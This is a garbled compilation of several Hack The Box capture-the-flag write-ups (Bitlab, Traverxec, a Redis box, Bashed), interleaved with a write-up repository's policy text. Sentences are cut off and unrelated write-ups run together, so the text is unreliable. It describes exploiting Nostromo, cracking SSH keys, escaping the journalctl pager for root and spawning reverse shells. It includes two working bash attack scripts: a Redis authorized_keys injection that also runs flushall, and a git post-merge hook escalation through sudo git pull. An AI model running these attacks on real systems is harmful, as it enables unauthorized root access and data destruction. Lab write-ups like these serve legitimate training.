Bitlab is a medium-difficulty Linux machine. Be sure to check out the Basic Setup section before you get started.
As always, enumeration is our first port of call. Clicking the Explore link at the bottom of the page brings us to another page that tells us there are no projects found. The Groups and Snippets links in the top menu also have nothing to show.
However, clicking the Help link presents a directory listing that contains a bookmarks file. Browsers write this kind of file when exporting bookmarks, so it could show us some juicy data.
Logging in to GitLab, we are presented with two projects, Profile and Deployer. There is also a link to a profile box Bootstrap snippet, which is contained in the index file. When an event occurs the index.
Looks like we have found the entry point for our foothold, and potentially even a leap straight to root, since sudo is being used.
All we need to do is update the Profile repository, commit the changes, submit a merge request and then merge the changes. This should satisfy all conditions of the webhook event that clave has set up, and our changes to the repository should be pulled into the profile directory on the system. To gain a shell we will simply edit the index file. We then go through clicking the buttons Commit changes, Submit merge request and then Merge.
We can upgrade our shell if we wish. First things first, we should take a look at the postgres mention we found in the Profile repository readme file. The Activity section shows a bunch of things we have already seen. Moving along to the Snippets link, we find a submission called Postgresql. Hopefully we can find some juicy info.
Looks like more credentials. At first I thought that the password was base64 encoded, as it decodes to the string ssh-str0ng-p ss.
However, the password is just disguised as one, potentially as a rabbit hole. We can simply log in with the password as is. We take yet another user. Time for root.
If you are missing the Executable modules and References windows, you can open them from View in the top menu. A list should appear in the References window showing a bunch of strings. One of these looked like it could be a password, but on checking this was not the case.
Machine writeups until March are protected with the corresponding root flag. Since that date, HTB flags are dynamic and different for every user, so it is not possible for us to maintain this kind of system.
So from now on we will accept only password-protected challenges and retired machines; write-ups of retired machines don't need a password. It is totally forbidden to unprotect (remove the password from) and distribute the PDF files of active machines; if we detect any misuse it will be reported immediately to the HTB admins. In any case, the authors of the writeups of active machines in this repository are not responsible for any misuse of the corresponding documents. Please remember that this is done to share techniques, not spoilers.
In this way, you will be added to our top contributors list (see below) and you will also receive an invitation link to an exclusive Telegram group where hints (not spoilers) for the HackTheBox machines are discussed. Please consider protecting the text of your writeup.
Of course, if someone leaks a writeup of an active machine it is not the responsibility of the author. If we detect someone doing this, we will immediately report them to the HTB staff so they can take the appropriate measures. Note: the minimum requirement to enter the "special" Telegram group is also to have Hacker level or higher (no script kiddies).
Hack The Box is a superb platform to learn pentesting: there are many challenges and machines of different levels, and with each one you manage to complete you learn something new.
But talking among ourselves we realised that there are often several ways to root a machine or get a flag. That's why we created this repository, as a place to share different unofficial writeups, to see different techniques and acquire even more knowledge.
That is our goal and our passion: to share in order to learn together. Some people have been distrustful because this repository contains writeups of active machines, even though every one of them is protected with the corresponding password (root flag or challenge flag).

A version scan with nmap did, however, reveal an interesting fact:
And sure enough, there was a vulnerability in it (CVE) which allowed remote code execution.
And for that a Metasploit module exists, so we simply use it to get our foothold shell as www-data. Enumerating, we can see that only one other user exists on the system; we need to escalate to that user first. Taking a look at the Nostromo configuration, we find an interesting option enabled:
At the very end, homedirs are enabled. We can simply look at which files are stored there with our existing shell. We copy that locally to our attacking machine. The private key is encrypted, so we brute-force the passphrase: first convert the key into a format that john understands, then brute-force it. Next we need to escalate to root. This script uses sudo to run journalctl.
We can simply call sudo journalctl ourselves and break out of the pager it opens. Once the pager is running, simply typing ! followed by a command at the pager prompt runs that command, here as root.

The website on port 80 showed nothing of interest for us. On port there was a Webmin instance running in version 1.
That leaves the open Redis port. There is a common way to escalate to a shell using Redis. There are two important things to mention here. First, the public key that we prepare to pipe into redis-cli is surrounded by a couple of newlines.
If they are missing, the SSH server will not be able to find our public key in the file, since Redis writes some binary data at the beginning of the line. Second, the file has to land in the .ssh directory of the redis user's home; that home directory can be looked up by installing the Redis service on a local machine and checking what is set as the default home for this user. This is still a rather constructed scenario since the.

Now we have a low-privileged shell on the system. Searching for files owned by this user, we find this:. The first hit looks interesting.
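The newline padding for the Redis authorized_keys trick described above, as an added example that is not code from the writeup. The padding and check functions run offline on a constructed dummy key; the redis-cli sequence is the standard flushall / set / config set dir / config set dbfilename / save chain and only runs when REDIS_HOST is set. The directory /var/lib/redis/.ssh is an assumption and has to be replaced with the real home of the redis user on the target.

```bash
#!/usr/bin/env bash
# Added example, not code from the writeup. Redis writes its dump file with
# binary header and trailer bytes around the stored value, so the public
# key is wrapped in blank lines before it is stored; sshd then finds the
# key on its own line inside the otherwise garbage authorized_keys file.
# The padding/check functions run offline; the remote step runs only when
# REDIS_HOST is set and uses /var/lib/redis/.ssh as an ASSUMED home for
# the redis user (look up the real one on the target or a local install).

# Wrap the public key in blank lines: $1 = public key file, $2 = output file.
make_padded_key() {
    printf '\n\n' > "$2"
    cat "$1" >> "$2"
    printf '\n\n' >> "$2"
}

# Check that the key still sits alone on a line that starts with the key
# type (ssh-rsa, ssh-ed25519, ...), which is what sshd will look for.
# Returns 0 if intact, 1 otherwise.
padded_key_ok() {
    grep -q '^ssh-[A-Za-z0-9-]* ' "$1"
}

# Remote step: store the padded key and make Redis save it as
# ~redis/.ssh/authorized_keys. WARNING: flushall wipes every key in the
# instance; it is used so the dump contains nothing but our value.
write_key_via_redis() {
    local padded=$1
    if [ -z "${REDIS_HOST:-}" ]; then
        echo 'REDIS_HOST not set; skipping remote step' >&2
        return 0
    fi
    redis-cli -h "$REDIS_HOST" flushall
    redis-cli -h "$REDIS_HOST" -x set ssh_key < "$padded"
    redis-cli -h "$REDIS_HOST" config set dir /var/lib/redis/.ssh
    redis-cli -h "$REDIS_HOST" config set dbfilename authorized_keys
    redis-cli -h "$REDIS_HOST" save
}

# Offline demo on a constructed dummy key (not a real key). Prints the line
# count of the padded file (2 blank + key + 2 blank = 5) and returns 0 when
# the key line survived the padding, 1 otherwise.
demo_padding() {
    local dir
    dir=$(mktemp -d)
    echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDummyKeyForTheDemoOnly demo@example' > "$dir/id.pub"
    make_padded_key "$dir/id.pub" "$dir/padded"
    if padded_key_ok "$dir/padded"; then
        wc -l < "$dir/padded" | tr -d ' '
        rm -rf "$dir"
        return 0
    fi
    rm -rf "$dir"
    return 1
}
```

Run `demo_padding` to see the padded layout, then `REDIS_HOST=<target> write_key_via_redis padded` once the redis user's real home is known; the authorized_keys file Redis produces is mostly RDB bytes, which is exactly why the blank lines around the key matter.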
An SSH private key backup file, readable by us, but encrypted. We copy it to our attacking Kali machine and brute-force the passphrase:. We now have the passphrase, but connecting via SSH using this key still fails.
But we now have valid credentials.

As with all HackTheBox machines, I started with an nmap scan, which identified port 80 as open and running nostromo 1. While searching for information on nostromo, pretty much the first search result was about a known vulnerability. I quickly found an exploit for it here. The exploit is basically a directory traversal vulnerability with remote command execution, hence the box name Traverxec. Using the above exploit script I poked around the box and found an.
Hoping those were credentials to log in via SSH, I tried that, but no. Apparently they were for something else, so I went back to poking around the box. At this point it became cumbersome to use the exploit script for every command, so I used it to spawn a reverse Netcat shell to my machine:.
For the next part I had to look closely at the nhttpd config file, where I found the . Something was amiss though: I had execute rights on that folder, so I could cd into it but not run ls in it. After looking at the usual files. This worked, and I was able to use ls here and find a backup file. This backup file contained a private SSH key, which I transferred to my host machine and cracked with john.
Finally I had credentials to SSH into the machine and grab the user flag. Looking up journalctl on GTFOBins revealed how to escape the pager and get a shell with ! With this I could read the root flag.

As is usual with HackTheBox, I started with an nmap scan and discovered ports 22 and 80 open.
Now the problem was where to find this file and execute it, and I wasted a long time on this step. I found a code snippet on the server with a PostgreSQL connection command that included the database username and password. Expanding on this snippet, I wrote some PHP code to extract information from the database:. Running this code the same way as the initial shell, I succeeded in extracting a username and password from the database itself:.
Trying the password without decoding it did work, so I guess that was the box maker's way of trolling us. After logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded it to my machine with scp:. After spending far too much time trying to run and reverse engineer the binary in a Windows 7 virtual machine, I gave up and used wine on Kali instead.

Two usernames can also be found in the above config file, and a third can be found on the forum page (Hazard).
Using lookupsid.

Then I check the folders found by gobuster and notice a couple of interesting files, including phpbash. This allows you to execute commands as user www-data. So I make a copy of the reverse shell, update the IP address and port, and then set up a web server to serve the file. With this sudo ability, I can get a bash shell as user scriptmanager. But using that to search around the system does not turn up any additional useful information. This brings up a few possible exploits, until I try the exploit. Since the target system is 64-bit, I use the -m64 flag to compile the file.
Then I upload it to the system and try it:. However, when I looked at the test.
So I thought there must be another member working on the system and poking around the script. I should be more careful and pay more attention to out-of-place things.
Thank you to the author Arrexel for the box Bashed. Alan Chan, October 20.

Summary: gobuster turns up phpbash, which gives command execution as www-data; sudo -l reveals that I can run commands as user scriptmanager, which gives a bash shell as scriptmanager; uploading the compiled exploit to the system and running it worked great, and I received a root shell.
Since the server was running PHP, I tried uploading a simple PHP reverse shell.
Bitlab is rated as a medium box on HackTheBox. Using ssh to log into the box as clave, I was able to get the user flag. Root: after logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded it to my machine with scp: scp clave Using this password I could ssh into the box as root and get the root flag.

The home page is redirected to the sign-in page.
The bottom has two links of interest: Explore and Help. The Explore link brings us to the Projects page, where we can see current projects, groups and snippets. All links except GitLab Login point to external sites.
To find out what the variable contains, we can use the development console. The easiest way to use these credentials is to bookmark the link (right-click on the link):. The credentials are populated into the sign-in form. How convenient. Of course, we can also simply type in the credentials ourselves. Now click on Sign In and we sign in to the application successfully.
This GitLab allows us to maintain our projects. Essentially, we can upload any files to the project. This will use ip-address Sure enough, we are able to perform git pull. So I do some research on Google and find a feature called git hooks. A couple of good reads can be found at:. For git pull, post-merge hook scripts can be used; they are triggered when a merge occurs. To achieve that, we create a local copy of the project Profile.
Then make some changes and perform a merge. Finally, doing sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy.

Privilege Escalation. Vulnerability: sudo git pull. Explanation: a post-merge hook script can be defined to execute code as root. Enumeration: nmap -p- -A -T4. The Help page only has a bookmarks file.
Now make it available to the website. Further reading: Git Hooks; githooks documentation.
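The post-merge hook technique used for root above (and the sudo git pull triggered through the webhook in the first Bitlab writeup on this page) as an added example; this script is not from any of the writeups. It runs entirely as the current user in a temporary directory, without sudo, so it can be tried offline; the upstream and profile repository names and the marker file are assumptions for the demo. On the box the same hook executes as root because root is the one running sudo git pull.

```bash
#!/usr/bin/env bash
# Added illustration, not code from the writeup: why "sudo git pull" in a
# checkout whose .git/hooks directory the low-privileged user can write to
# is code execution as root. Hooks live only in the local .git directory
# (they are never pushed or cloned), so the attacker plants one locally and
# then lands a commit upstream; the hook runs with the privileges of whoever
# runs "git pull". This demo uses no sudo and runs in a temp directory; the
# repo names and the marker file are assumptions for the demo.
set -euo pipefail

export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid

# Create an "upstream" repo (stands in for the GitLab project) and a
# checkout of it (stands in for the profile directory root pulls into).
setup_repos() {
    local work=$1
    git init -q "$work/upstream"
    ( cd "$work/upstream" \
      && echo '<h1>profile</h1>' > index.html \
      && git add index.html \
      && git commit -q -m 'initial commit' )
    git clone -q "$work/upstream" "$work/profile"
    git -C "$work/profile" config pull.rebase false   # plain merge, so post-merge fires
}

# Attacker step 1: plant a post-merge hook in the checkout. This needs write
# access to .git/hooks in the checkout only, not to the upstream project.
plant_hook() {
    local work=$1
    printf '#!/bin/sh\nid > "%s/marker"\n' "$work" > "$work/profile/.git/hooks/post-merge"
    chmod +x "$work/profile/.git/hooks/post-merge"
}

# Attacker step 2: land a new commit upstream (on the box: commit, open a
# merge request, merge it) so the next pull actually has something to merge.
push_upstream_change() {
    local work=$1
    ( cd "$work/upstream" \
      && echo '<p>new content</p>' >> index.html \
      && git commit -q -am 'update profile' )
}

# Victim step: the privileged user runs "git pull" (on the box: sudo git pull).
# Prints the hook's output (the "id" line of whoever pulled) and returns 0
# when the hook fired, 1 when it did not.
run_demo() {
    local work
    work=$(mktemp -d)
    setup_repos "$work"
    plant_hook "$work"
    push_upstream_change "$work"
    git -C "$work/profile" pull -q
    if [ -s "$work/marker" ]; then
        cat "$work/marker"
        rm -rf "$work"
        return 0
    fi
    rm -rf "$work"
    return 1
}
```

`run_demo` prints the output of `id` as written by the hook; on the target that line would read uid=0(root), which is the whole privilege escalation. Note that the hook content never appears in the upstream repository or in any merge request, so reviewing the merged change does not reveal it.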